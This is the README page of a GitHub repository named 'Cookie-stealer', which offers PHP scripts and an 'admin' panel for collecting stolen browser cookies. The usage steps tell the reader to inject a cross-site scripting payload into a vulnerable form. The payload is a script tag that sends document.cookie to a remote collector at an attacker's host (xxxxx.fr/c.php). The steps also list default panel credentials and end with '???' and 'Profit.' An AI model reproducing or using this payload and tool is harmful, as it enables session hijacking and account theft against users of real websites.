Skip to content

akuz0/Cookie-stealer

 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

6 Commits
 
 
 
 
 
 

Repository files navigation

Cookie

Cookie-stealer

Crappy cookie stealer with 'admin' panel made long time ago..

admin.php to view your cookies, c.php to grab the cookies. c.php will write the cookies into admin.php, be sure to have write access on your server.

Usage

  1. Drop admin.php and c.php in the same directory.
  2. Go to your vulnerable formulary and send him a payload to your c.php?c= something like this:
  • <script>document.write("<img src='http://xxxxx.fr/c.php?c="+document.cookie+"'></img>");</script>
  1. Navigate to admin.php, login with username: root password: toor
  2. ???
  3. Profit.

About

Crappy cookie stealer

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

  • PHP 100.0%